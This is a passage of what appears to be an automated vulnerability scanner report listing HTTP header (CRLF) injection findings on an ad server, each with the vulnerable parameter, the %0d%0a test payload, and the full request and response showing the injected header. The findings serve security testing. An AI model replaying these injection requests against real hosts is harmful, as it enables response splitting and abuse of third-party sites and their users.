Set-Cookie: ANON_ID=aQnEV8o0PaEAZb2t7YSZahO44KovZdgmYnZaUlSNumRLA5j2Zb0QTO0bBPWf9QQfDdsBsYhZbyGNNRN7XpeSVtI6fOkafq3UMhmK4di9a6YfvT8JAl4ua1fl9apuUjZa68NRgWZdHIyuA4u3ZdrluerOS4r2vHlcd0vxcYMhgWRmMrWrEs8p60FVLxqZdihwHbf0MOwrOyCVKxe1XSNS97iS7l3fBVf59sBk0fgt2H5kl5o6X6l9bkdiZbZd1qCrq91noQZdZchZcx1wdoamjcVLqf0RDY3sIwMMyj3ju8wbNHkAmwnlPFUACdFt02ItqRZd9Qmb0j7fXkgdTQaMmVTvewJics7RSrjYxtDPfiraqqjVExFZcZbJcShv10tOiVI8p5IBMu2uHwb1ZdbGQW8vvj4WGiZdGXPWhxqBmtutctZcaplTVfjPtkaRhq8yZaD08NZbDuMHEIqSYZdr7EuLlOmlNN4GOjfM8wgMMcxvLs2ZcOwiMbcU2Pi4ccdY58WMEjpylhAZb7QMdEYovwxLstUt6Zd3sIZarlsfUTFJjAraxj1wL35gkHEXZbZb6HNmqXYiqDfdV3hlNGADc3Ldbg; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:11 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=ee931
cbd419af417&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the migTrackFmtExt request parameter is copied into the Location response header. The payload 7de0b%0d%0af87942a728d was submitted in the migTrackFmtExt parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=7de0b%0d%0af87942a728d&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aunEN7wl6jZadiYpcUxji4c3MN5KL2pTZbAm1uEL5jeHi3BgOAILHZa2B3J2k7qJoW9E6whaQSZbm3ZcajiYTbhnRWIiiWdHpxbF5ZapPcP9JyZdoOvZc190pXfwUoNQRxo9642aEwHQn95x5alf5ZaAWc2SgLEIV4crWZbQCwlccQZbqhGth9C0Zb8w6JKUZbCnVBwEguQG0lFZcZaWDvYZdWZcGoB8DZbIjdXTATMZdPw8IwSHa74oj5BSP7YSZbGyH3Fp2jVmcnZai4bYLm4XsFQviZdg9MpG30w6xw2Ekg7Xd1JT8kUlotShZape0cExg41tG3ww1osoJ9XiQ7Gfy65ZajRX1iKOG5d0hfdf9rnspLSqfKilSH6YFDg3oeCZbZcbmMv1dnxUyUs3q9SMPX1YUk66G7mEyZa4vvfZbGZaeDUH6ZcZddtxLt2Ihsg1ahWQaB9kBfVPCrfxBZadGa5b5yyTkTmtxr9HlL3K4NqnmdDMKHP4oOaM44KdYywaeaGNFs4251fWiTLImsyOKcQe034kj3DmycjMZaevhyrNMl5RV9VvhgCjjCuWZaNnIbOZb78YfarpDlZbFHDyUASA; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:55 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=7de0b
f87942a728d&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the migUnencodedDest request parameter is copied into the Location response header. The payload 4189b%0d%0a7791b4f74c2 was submitted in the migUnencodedDest parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=4189b%0d%0a7791b4f74c2&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aInEV8qkaBJDBcN6JQjv1USjRZaHKuy4dGfuk8lQjvPvKem0dMiZck2Et2Q5BdIYcC5D2N5wd9nZaKdEZdubrqxKdEfZdfZbqAZcEUaFNwY6pYBETBIOJKvGdVJ3ohSqISuxl7s50Zc8wny3t6cOKZc92U7fO0xWSJfiZcfAfx4x9eHl1Q6yDPF69BGxAvxZbZdZbQPWShwGTwMcu8GnbTka4jZaMOWZbXiiR4sLZcTLloZbFMLtvrdsdZdloJXYRcacrWVZcEK86fZaWbZaCwB4PZa4ruEoyI8OZaRnbbruyaLwN8JR3UZbCv5AZbWCjJooh7SCqKkJpl0G8oQigNDwLMWoYOWnbtrP5iyjIAYCh83BnyOM8Zb3YefXm1KvVYLkZaUuFqUBCr7SZaUnuCdvsX8Px4SHnD6Fp7Wsb5SsRMfJbjcLbjuCZcZaQDVaeZaRbjaJKnvMAIkTZb3351OqQMJHvgdQQ2sEQHLa0xYZbZbvQvk1EqbZdsn4iqoqbm0jtrU0nrjva55HGC9Tl8kW3ZaHHaegXSyZaOLPPdsNq4x2FBWHuICrqCCPc4aVSRLUpvxZbp2QwtCN6yBhk5poNSUy3ZcYyUu; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:12 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=4189b
7791b4f74c2&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 1349f%0d%0a72cb2b1477e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?1349f%0d%0a72cb2b1477e=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aqnEN7mMZaCZdBbyppueZbhWSY4XpsSfALQk7DZbEgZdsVj4HWnrgi5Zcbbsqr6iqodTFtYMI34h4RW907yBXbeDek1xHtIuULbn1r2F67QMWaCZdDZcdNCLQZbcFVHQZdbMdY5Qy5hBMgeWZdJkJdKhmaV4QIuLZdlsNSoCYxLgZdLedUZbaUAZbXd4MjlmSDanZdYDbu72rQgZbLaDedeuuoPL3GH8QqNgBmVGEUpYT1RTj71ZdSMiRi2ifo3u3nM2xx5q7poxGZddXoMHlqAUy6nTR6YOhMEZdW8dQ5eg9Y7xj1CZcinpa6rcSZbZacr9iQX9KeOgKMrDfbXXZakkTe72eDtfDuLNoakXWWkIZcejQyj3FnBhEt3iQYEHS0vt8WHKcmAsNiZcv0rbC4wgiFeeD5MBN6XesnoVxHsKYUU5HG0fjRKePVlZbZdbIMIxx4H92LMGBJSZcrp4K8ehQS7E0PDOrCBCT6WJgQCCVKZc8ZaIwm9rKLLaZceKWfktnwXRF4MCaatlpSCpbttWt5KI08myIT6QcxtOF2NsXaKJSZc628N3IuOvJFXv4soM7oHMOlEKGpDeku9AR4mHv; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:05 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?1349f
72cb2b1477e=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 124dd%0d%0a93ae5762393 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/?124dd%0d%0a93ae5762393=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ahnhF4m5aSZb8e9wPQIj1pvoeZd94UD569JXChtVEbF1WZai53mDNZboMeD6cjijWRYOBKZbFEDyY2vvZcjZbOpmZc7WptM38gKnsZaIokGBb7ZdZcFFi3ZcBfkcHwqnYZaHZb1Jv9WZde8ZcM9nXDJvMssIa8XiiiXC7jUcmRNMxZcUZaAkZb4oKRvkSZcmlJsuPOdG2g3sZbqkft6WsE1LTgF7eIqYkAoTgE63onZc7HHsZaehC5hA4w3ZdqRRcZaa6bOM7YgKZdfJHXaZcQBTJDl9AJmUfbwfnIXGUsPCh3jFLESje6XFfwjmgDYneZcisZdRRbFW2jlhmRqTi2gIvFJSXUxyU8phim3vpHr9FCQNfNgXYc2kreedbgC0fT5ZcrZcd5NRcBQfhalI0T2gxBJxBtZcpQDM20i5RhnX1RN8VZbXFvErZdQppMIyOBZdY0kMKOE6sZaSwO5kwaGGoVr4KZaOx5NguPjgnOkoDsPEu5LgcwZavZdeaoObaWKOGHJ; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:18 GMT;
Content-Type: text/html
Location: ?124dd
93ae5762393=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/

Issue detail

The value of the ord request parameter is copied into the Location response header. The payload 7ac8c%0d%0a46bc1d03be4 was submitted in the ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/;ord=7ac8c%0d%0a46bc1d03be4 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aDnhF4rwZaKIpZa7MBU8ZaYttvKDbQn9u9B3fE01H6BTfPfq4XWDi7bYVenGWlZb8f11ZboZdEYWbZcmaSaeZaelStBPiClshwZcxGnuklPMBu6Vwfu2sMNLQfwjZdMDLbvBFGgZbZa1iRxZcQGLkqDv42GVpJQVoqi1c7fWOZcR1vXTIyhQTw77Za9Syo520MqZaZaXVF0gIka5VMsDaCmAeqfTBGYnXDAOMu9HWDP9gRmoJfAy4WvYrwHESrWh5vtYZcq9JJ2TumAvHxOZdFQP065DeZbccWOAGBykQbOt7kHyacvZd61rdXvgIbMFv5XLQbt9MIS0XFcV0w8DZaZdgZbFcwaodZcJt42bSonEgRrYP9Xi8P6VSZdrKZahoTcBZaZdWfKtDbFPVZdNhWx0XAcRIUb2jZbGk3ONgID0dsSuDiTfGiVy0HAWXRg2Gav0ZahcMSASB309p19shyIuZbI864u5IOuZc4eth4HE5M6ZcaicmvK8vT8QBgLMGmr; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:05 GMT;
Content-Type: text/html
Location: ;ord=7ac8c
46bc1d03be4
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of the ;ord request parameter is copied into the Location response header. The payload d1d25%0d%0aa6bf3daf369 was submitted in the ;ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=d1d25%0d%0aa6bf3daf369 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=annFNfoZdUQMo2HpivbwkXqrnTC3Gq4ZamyyXMNuQ5tpx4qkEqfbRrjjSdPNrBJTcUkZaZbfXx2aKlrIsUwBiFxVnWqtR1BUNFc109MAN5UxU7cik5WAjeajoV6F5D8yNswhqCd0j5AJcfQPB9oPXqfZcAqlKyrSZdNZdqVN0GeGG1mnmxdZaCyfIWG4u4vHZcvTyFdnGocxbW98c7xrVkIT71ESOa599qlUM0MVlGAAkV0iw1qCrwbsAlxlN5neGdydMBFHQpGefVxuZaMkal3YBuBBujHnmccCxp6NSXVhUNs60b1Zauc1EcPpcHJeM3e2Ws13QKvTcncsKh8IFwbdcZcFdF6y2pYTIhf7yy6lxPytJShdrPm7bK3jtkwUaZaRaSiMTcG9CvcmTu2Exo3VWpgMAcyvW39AIaHdi3mXpZb5BfecTFMkSylJtg8fsCx9PpyYTKCcYQn4fVYFZb9HSyoQpMngmEQARRrTQ5DACnmUk5HkV4kwI9TACYmfXQxaDi8bCsrxmwBJrsFCwkg8owqwLwWigScYSsUqiSWZau3Jxh1WhIo4BvsWiPZacwQ20JUUiUWv0iGJZaTCgW; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:00 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=d1d25
a6bf3daf369
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 10 is copied into the Location response header. The payload 6be6d%0d%0a319c4e9da96 was submitted in the REST URL parameter 10. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/6be6d%0d%0a319c4e9da96/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
